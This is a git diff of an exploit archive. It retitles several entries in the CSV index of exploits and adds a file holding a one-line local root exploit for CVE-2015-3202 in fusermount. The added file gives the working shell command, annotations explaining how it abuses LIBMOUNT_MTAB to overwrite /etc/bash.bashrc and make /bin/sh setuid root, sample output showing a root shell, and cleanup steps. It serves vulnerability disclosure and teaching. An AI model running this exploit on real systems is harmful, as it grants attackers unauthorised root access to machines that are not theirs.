diff --git a/files.csv b/files.csv index 85dfc377a..d4eede4c4 100755 --- a/files.csv +++ b/files.csv @@ -17687,7 +17687,7 @@ id,file,description,date,author,platform,type,port 20356,platforms/windows/webapps/20356.py,"ManageEngine Service Desk Plus 8.1 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 20357,platforms/windows/webapps/20357.py,"alt-n mdaemon free 12.5.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 20358,platforms/php/webapps/20358.py,"wordpress mini mail dashboard widget 1.42 - Stored XSS",2012-08-08,loneferret,php,webapps,0 -20359,platforms/windows/webapps/20359.py,"otrs open technology real services 3.1.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 +20359,platforms/windows/webapps/20359.py,"OTRS Open Technology Real Services 3.1.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 20360,platforms/php/webapps/20360.py,"wordpress postie plugin 1.4.3 - Stored XSS",2012-08-08,loneferret,php,webapps,0 20361,platforms/php/webapps/20361.py,"wordpress simplemail plugin 1.0.6 - Stored XSS",2012-08-08,loneferret,php,webapps,0 20362,platforms/windows/webapps/20362.py,"smartermail free 9.2 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 @@ -21865,7 +21865,7 @@ id,file,description,date,author,platform,type,port 24703,platforms/cgi/webapps/24703.txt,"LinuxStat 2.x - Remote Directory Traversal Vulnerability",2004-10-25,anonymous,cgi,webapps,0 24704,platforms/linux/remote/24704.c,"Libxml2 - Multiple Remote Stack Buffer Overflow Vulnerabilities",2004-10-26,Sean,linux,remote,0 24705,platforms/windows/dos/24705.txt,"Microsoft Internet Explorer 6.0 Font Tag Denial of Service Vulnerability",2004-10-26,"Jehiah Czebotar",windows,dos,0 -24922,platforms/multiple/webapps/24922.txt,"OTRS FAQ Module - Persistent XSS",2013-04-08,"Luigi Vezzoso",multiple,webapps,0 +24922,platforms/multiple/webapps/24922.txt,"OTRS 3.x - FAQ Module Persistent XSS",2013-04-08,"Luigi Vezzoso",multiple,webapps,0 24707,platforms/multiple/remote/24707.txt,"Google Desktop Search Remote Cross-Site Scripting Vulnerability",2004-10-26,"Salvatore Aranzulla",multiple,remote,0 24708,platforms/windows/dos/24708.txt,"Quicksilver Master of Orion III 1.2.5 - Multiple Remote Denial of Service Vulnerabilities",2004-10-27,"Luigi Auriemma",windows,dos,0 24889,platforms/php/webapps/24889.txt,"Wordpress Mathjax Latex Plugin 1.1 - CSRF Vulnerability",2013-03-26,"Junaid Hussain",php,webapps,0 @@ -23681,8 +23681,8 @@ id,file,description,date,author,platform,type,port 26547,platforms/php/webapps/26547.txt,"PHPPost 1.0 mail.php user Parameter XSS",2005-11-21,trueend5,php,webapps,0 26548,platforms/hardware/dos/26548.pl,"Cisco PIX TCP SYN Packet Denial of Service Vulnerability",2005-11-22,"Janis Vizulis",hardware,dos,0 26549,platforms/php/webapps/26549.txt,"Torrential 1.2 Getdox.PHP Directory Traversal Vulnerability",2005-11-22,Shell,php,webapps,0 -26550,platforms/cgi/webapps/26550.txt,"OTRS 2.0 Login Function User Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0 -26551,platforms/cgi/webapps/26551.txt,"OTRS 2.0 AgentTicketPlain Action Multiple Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0 +26550,platforms/cgi/webapps/26550.txt,"OTRS 2.0 - Login Function User Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0 +26551,platforms/cgi/webapps/26551.txt,"OTRS 2.0 - AgentTicketPlain Action Multiple Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0 26552,platforms/cgi/webapps/26552.txt,"OTRS 2.0 index.pl Multiple Parameter XSS",2005-11-22,"Moritz Naumann",cgi,webapps,0 26553,platforms/php/webapps/26553.txt,"Machform Form Maker 2 - Multiple Vulnerabilities",2013-07-02,"Yashar shahinzadeh",php,webapps,0 26554,platforms/windows/local/26554.rb,"Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation",2013-07-02,metasploit,windows,local,0 @@ -27061,7 +27061,7 @@ id,file,description,date,author,platform,type,port 29959,platforms/hardware/webapps/29959.txt,"TVT TD-2308SS-B DVR - Directory Traversal Vulnerability",2013-12-01,"Cesar Neira",hardware,webapps,0 29960,platforms/php/webapps/29960.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 index.php Multiple Parameter SQL Injection",2007-05-07,"John Martinelli",php,webapps,0 29961,platforms/php/webapps/29961.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 index.php l Parameter XSS",2007-05-07,"John Martinelli",php,webapps,0 -29962,platforms/cgi/webapps/29962.txt,"OTRS 2.0.4 Index.PL Cross-Site Scripting Vulnerability",2007-05-07,ciri,cgi,webapps,0 +29962,platforms/cgi/webapps/29962.txt,"OTRS 2.0.4 - Index.PL Cross-Site Scripting Vulnerability",2007-05-07,ciri,cgi,webapps,0 29963,platforms/php/webapps/29963.txt,"Kayako eSupport 3.0.90 Index.PHP Cross-Site Scripting Vulnerability",2007-05-07,Red_Casper,php,webapps,0 29964,platforms/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 SpntSvc.EXE Remote Stack Based Buffer Overflow Vulnerability",2007-05-07,MC,windows,remote,0 29965,platforms/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 Picture.PHP Cross-Site Scripting Vulnerability",2007-05-08,"Jesper Jurcenoks",php,webapps,0 @@ -33152,7 +33152,7 @@ id,file,description,date,author,platform,type,port 36735,platforms/php/webapps/36735.txt,"Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF",2015-04-13,"Claudio Viviani",php,webapps,0 36736,platforms/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",php,webapps,0 36738,platforms/php/webapps/36738.txt,"Wordpress N-Media Website Contact Form with File Upload 1.3.4 - Shell Upload Vulnerability",2015-04-13,"Claudio Viviani",php,webapps,0 -36746,platforms/linux/local/36746.c,"Apport/Abrt Local Root Exploit",2015-04-14,"Tavis Ormandy",linux,local,0 +36746,platforms/linux/local/36746.c,"Apport/Abrt - Local Root Exploit",2015-04-14,"Tavis Ormandy",linux,local,0 36761,platforms/php/webapps/36761.txt,"WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit",2015-04-14,LiquidWorm,php,webapps,80 36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 x86 - PoC",2015-04-13,sleepya,linux,dos,0 36742,platforms/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,linux,remote,0 @@ -33471,3 +33471,4 @@ id,file,description,date,author,platform,type,port 37085,platforms/php/webapps/37085.txt,"Seditio CMS 165 'plug.php' SQL Injection Vulnerability",2012-04-15,AkaStep,php,webapps,0 37086,platforms/php/webapps/37086.txt,"WordPress Yahoo Answer Plugin Multiple Cross Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps,0 37087,platforms/php/webapps/37087.txt,"TeamPass 2.1.5 'login' Field HTML Injection Vulnerability",2012-04-17,"Marcos Garcia",php,webapps,0 +37089,platforms/linux/local/37089.txt,"Fuse - Local Privilege Escalation",2015-05-23,"Tavis Ormandy",linux,local,0 diff --git a/platforms/linux/local/37089.txt b/platforms/linux/local/37089.txt new file mode 100755 index 000000000..3fe67c403 --- /dev/null +++ b/platforms/linux/local/37089.txt @@ -0,0 +1,98 @@ +Source: https://gist.github.com/taviso/ecb70eb12d461dd85cba +Tweet: https://twitter.com/taviso/status/601370527437967360 + + + +# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet. + +12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890 +a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 + +# Here's how it works, $a holds the name of a shellscript to be executed as +# root. +a=/tmp/.$$; + +# $b is used twice, first to build the contents of shellscript $a, and then as +# a command to make $a executable. Quotes are unused to save a character, so +# the seperator must be escaped. +b=chmod\ u+sx; + +# Build the shellscript $a, which should contain "chmod u+sx /bin/sh", making +# /bin/sh setuid root. This only works on Debian/Ubuntu because they use dash, +# and dont make it drop privileges. +# +# http://www.openwall.com/lists/oss-security/2013/08/22/12 +# +echo $b /bin/sh>$a; + +# Now make the $a script executable using the command in $b. This needlessly +# sets the setuid bit, but that doesn't do any harm. +$b $a; + +# Now make $a the directory we want fusermount to use. This directory name is +# written to an arbitrary file as part of the vulnerability, so needs to be +# formed such that it's a valid shell command. +a+=\;$a; + +# Create the mount point for fusermount. +mkdir -p $a; + +# fusermount calls setuid(geteuid()) to reset the ruid when it invokes +# /bin/mount so that it can use privileged mount options that are normally +# restricted if ruid != euid. That's acceptable (but scary) in theory, because +# fusermount can sanitize the call to make sure it's safe. +# +# However, because mount thinks it's being invoked by root, it allows +# access to debugging features via the environment that would not normally be +# safe for unprivileged users and fusermount doesn't sanitize them. +# +# Therefore, the bug is that the environment is not cleared when calling mount +# with ruid=0. One debugging feature available is changing the location of +# /etc/mtab by setting LIBMOUNT_MTAB, which we can abuse to overwrite arbitrary +# files. +# +# In this case, I'm trying to overwrite /etc/bash.bashrc (using the name of the +# current shell from $0...so it only works if you're using bash!). +# +# The line written by fusermount will look like this: +# +# /dev/fuse /tmp/.123;/tmp/.123 fuse xxx,xxx,xxx,xxx +# +# Which will try to execute /dev/fuse with the paramter /tmp/_, fail because +# /dev/fuse is a device node, and then execute /tmp/_ with the parameters fuse +# xxx,xxx,xxx,xxx. This means executing /bin/sh will give you a root shell the +# next time root logs in. +# +# Another way to exploit it would be overwriting /etc/default/locale, then +# waiting for cron to run /etc/cron.daily/apt at midnight. That means root +# wouldn't have to log in, but you would have to wait around until midnight to +# check if it worked. +# +# And we have enough characters left for a hash tag/comment. +LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 + +# Here is how the exploit looks when you run it: +# +# $ a=/tmp/_;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 +# fusermount: failed to open /etc/fuse.conf: Permission denied +# sending file descriptor: Socket operation on non-socket +# $ cat /etc/bash.bashrc +# /dev/fuse /tmp/_;/tmp/_ fuse rw,nosuid,nodev,user=taviso 0 0 +# +# Now when root logs in next... +# $ sudo -s +# bash: /dev/fuse: Permission denied +# # ls -Ll /bin/sh +# -rwsr-xr-x 1 root root 121272 Feb 19 2014 /bin/sh +# # exit +# $ sh -c 'id' +# euid=0(root) groups=0(root) +# +# To repair the damage after testing, do this: +# +# $ sudo rm /etc/bash.bashrc +# $ sudo apt-get install -o Dpkg::Options::="--force-confmiss" --reinstall -m bash +# $ sudo chmod 0755 /bin/sh +# $ sudo umount /tmp/.$$\;/tmp/.$$ +# $ rm -rf /tmp/.$$ /tmp/.$$\; +# \ No newline at end of file